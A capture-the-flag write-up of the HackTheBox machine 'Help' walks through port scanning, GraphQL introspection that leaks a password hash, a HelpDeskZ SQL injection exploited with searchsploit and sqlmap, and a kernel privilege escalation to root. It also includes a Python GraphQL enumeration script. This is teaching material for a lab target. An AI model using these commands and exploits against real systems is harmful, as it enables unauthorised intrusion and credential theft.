Help

#Linux #SQLi #API

Help is an easy-rated Linux machine from HackTheBox created by cymtrick. In this post my IP is 10.10.14.23 and the target's IP is 10.129.227.176.

I assume that the machine is pretty random, with the version obtainable only from a "readme" whose existence you only know about from git... the URL vulnerable to SQLi is really hidden; I didn't like this machine at all.

Recon

Local Terminal
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n

Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 128
80/tcp open  http    syn-ack ttl 128
3000/tcp open  ppp    syn-ack ttl 128

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
           Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)
Local Terminal
nmap -sCV -p 22,80,3000 10.129.227.176 -oN Target

Nmap scan report for 10.129.227.176
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Local Terminal
whatweb help.htb

http://help.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.227.176], 
Title[Apache2 Ubuntu Default Page: It works]
  • Browser: http://help.htb

At this point we have nothing: port 80 is just a website with the default Apache index, so the best option is to fuzz for directories.

Local Terminal
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt help.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://help.htb/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000041:   301        9 L      28 W       306 Ch      "support"
000001059:   301        9 L      28 W       309 Ch      "javascript"

Only "support" and "javascript" turn up. Let's have a look at /support/ first.

http://help.htb/support/

It is a support ticket portal with a login, and we have no credentials to use here yet, so let's move on to the other port.

Port 3000

http://help.htb:3000/

All right, this looks like a taunt; let's extract more information.

Local Terminal
$ curl -v http://help.htb:3000/

*   Trying 10.129.227.176:3000...
* Connected to help.htb (10.129.227.176) port 3000 (#0)
> GET / HTTP/1.1
> Host: help.htb:3000
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< X-Powered-By: Express 
< Content-Type: application/json; charset=utf-8
< Content-Length: 81
< ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
< Date: Sun, 09 Jul 2023 15:23:28 GMT
< Connection: keep-alive
<
* Connection #0 to host help.htb left intact
{"message":"Hi Shiv, To get access please find the credentials with given query"}  

Nothing more from curl, but the message hints that there is a query to find, so let's fuzz the endpoint with an API-specific wordlist.

Local Terminal
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/api.txt help.htb:3000FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://help.htb:3000FUZZ/
Total requests: 584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000215:   400        0 L      3 W        18 Ch       "/graphql"
000000216:   400        0 L      3 W        18 Ch       "/graphql/console"

Total time: 0
Processed Requests: 562
Filtered Requests: 560
Requests/sec.: 0

So there is a GraphQL endpoint behind the API. GraphQL servers normally support introspection, which lets us enumerate the schema before touching any real query.

Local Terminal
└─# curl -s http://help.htb:3000/graphql
GET query missing.

GraphQL is normally queried with POST, so intercept the request with Burp Suite, change the method to POST, add the header "Content-Type: application/json" and send a standard introspection query as the JSON body.

It works, and you can do the same with curl:

Local Terminal
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}

The schema has a "User" type, so let's list its fields and then dump it.

Local Terminal
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}
Local Terminal
curl -s http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .
{
  "data": {
    "user": {
      "username": "helpme@helpme.com",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}

We have an email and a password hash (32 hex characters, so most likely MD5). These should work on the support portal, but first the hash has to be cracked; the recovered password used below is godhelpmeplz.
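The introspection steps above can be scripted. The following Python is an added example for this writeup, not code from the box or from any project: it sends the introspection query, keeps only the application's own object types (dropping scalars and the built-in __* types), and builds a ready-to-send query for every root field. The sample response embedded in it is constructed to match the output above so that the parsing runs offline; the endpoint URL and the POST JSON shape are the only assumptions.

```python
"""Enumerate a GraphQL API via introspection and build a query for every root
field.  Added example for this writeup, not code from the box or from any
project.  Assumes only what the page shows: the endpoint takes POST JSON of the
form {"query": "..."} and introspection is enabled."""
import json
import sys
import urllib.request

# Introspection query: root query type, every type, each field and its type
# (two levels of ofType unwrapping cover NON_NULL / LIST wrappers).
INTROSPECTION = """{ __schema { queryType { name } types { name kind fields { name
  type { name kind ofType { name kind ofType { name kind } } } } } } }"""

# Constructed response modelled on the output above (Query.user -> User with
# username/password).  It lets the parsing code run offline; a real dump also
# carries the __Schema/__Type/... introspection types, which we skip.
SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "user", "type": {"name": "User", "kind": "OBJECT", "ofType": None}}]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "username", "type": {"name": None, "kind": "NON_NULL",
                                          "ofType": {"name": "String", "kind": "SCALAR"}}},
            {"name": "password", "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]},
        {"name": "String", "kind": "SCALAR", "fields": None},
        {"name": "__Schema", "kind": "OBJECT", "fields": [
            {"name": "types", "type": {"name": None, "kind": "LIST",
                                       "ofType": {"name": "__Type", "kind": "OBJECT"}}}]},
    ]}}}


def named_type(t):
    """Unwrap NON_NULL / LIST wrappers down to the named type."""
    while t is not None and t.get("name") is None:
        t = t.get("ofType")
    return t["name"] if t else None


def user_types(schema):
    """{type_name: {field_name: field_type_name}} for application OBJECT types,
    skipping scalars and the built-in __* introspection types."""
    out = {}
    for t in schema["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        out[t["name"]] = {f["name"]: named_type(f["type"]) for f in t.get("fields") or []}
    return out


def selection(type_name, types, depth=3):
    """Selection set for an object type; recurse into nested objects, bounded by
    depth so self-referencing schemas do not loop forever."""
    parts = []
    for fname, ftype in types[type_name].items():
        if ftype in types and depth > 0:
            parts.append(f"{fname} {selection(ftype, types, depth - 1)}")
        else:
            parts.append(fname)
    return "{ " + " ".join(parts) + " }"


def build_queries(schema):
    """One ready-to-send query per root field, e.g. '{ user { username password } }'."""
    types = user_types(schema)
    root = schema["queryType"]["name"]
    return {f: (f"{{ {f} {selection(ftype, types)} }}" if ftype in types else f"{{ {f} }}")
            for f, ftype in types[root].items()}


def post_graphql(url, query):
    """Send a query as JSON, the way the curl commands above do."""
    req = urllib.request.Request(url, data=json.dumps({"query": query}).encode(),
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # usage: python3 gql_enum.py http://help.htb:3000/graphql   (no URL: offline sample)
    if len(sys.argv) > 1:
        schema = post_graphql(sys.argv[1], INTROSPECTION)["data"]["__schema"]
    else:
        schema = SAMPLE_RESPONSE["data"]["__schema"]
    for name, fields in user_types(schema).items():
        print(f"type {name}: {fields}")
    for field, query in build_queries(schema).items():
        print(f"{field}: {query}")
```

Against the sample response this prints the User type with its two fields and the query `{ user { username password } }`, which is exactly the one sent by hand above; on a larger schema it saves running one __type query per type.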

Exploitation

Reverse Shell (Help)

After exploring the website and testing the ticket system, I found nothing... let's just search for "HelpDeskZ GitHub".

http://help.htb/support/readme.html

Local Terminal
searchsploit HelpDeskZ

-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                             | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                      | php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Local Terminal
searchsploit -m 41200.py

Edit the Python script and add as the first line: # -*- coding: utf-8 -*-

And at line 94, change it to: session = requests.session()

Local Terminal
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz

------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment

OK, we need to submit another ticket with a file attached, then run the exploit again and wait.

In the end it does not work, but at least we now know the URL where the injection happens:

http://help.htb/support/?v=view_tickets&action=ticket&param[]=5&param[]=attachment&param[]=1&param[]=7

Intercept the download request for an attachment with Burp and save it to a file (here named request).

Now run sqlmap against the saved request to extract the password hash. Because the URL repeats the param[] key, -p alone is ambiguous about which occurrence is injectable; if sqlmap finds nothing, mark the injectable value in the saved request with an asterisk (*) and drop -p so it tests exactly that position.

Local Terminal
sqlmap -r request --level 5 --risk 3 -p param[]

sqlmap extracts the password hash; cracking it gives Welcome1, which also works for SSH as the user help.


Local Terminal
$ ssh -l help 10.129.227.176  # Password: Welcome1

$ cat user.txt
4dbb347ce71e1f06251894265c3bdb90

Privilege Escalation

We have the first flag; now some basic enumeration for privilege escalation.

Target Terminal [help]
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)

help@help:~$ sudo -l
[sudo] password for help:
Sorry, user help may not run sudo on help.

help@help:~$ cd /
help@help:/$ find / -perm -4000 2>/dev/null
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
<...>

help@help:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.5 LTS
Release:        16.04
Codename:       xenial

help@help:/$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

The kernel reported by "uname -a" (4.4.0-116 on Ubuntu 16.04) is unusually old. Searching Exploit-DB for "Linux Kernel 4.4.0-116" turns up a local privilege escalation for exactly this kernel, and its output matches what we see below.

Copy the exploit source to /tmp as exploit.c (paste it with nano), then compile it with: gcc -o attack exploit.c

Target Terminal [root]
help@help:/tmp$ ./attack
task_struct = ffff88003ba2aa80
uidptr = ffff88003ab0e184
spawning root shell

root@help:/tmp# cat /root/root.txt
62106a044573c82858c99023794af117
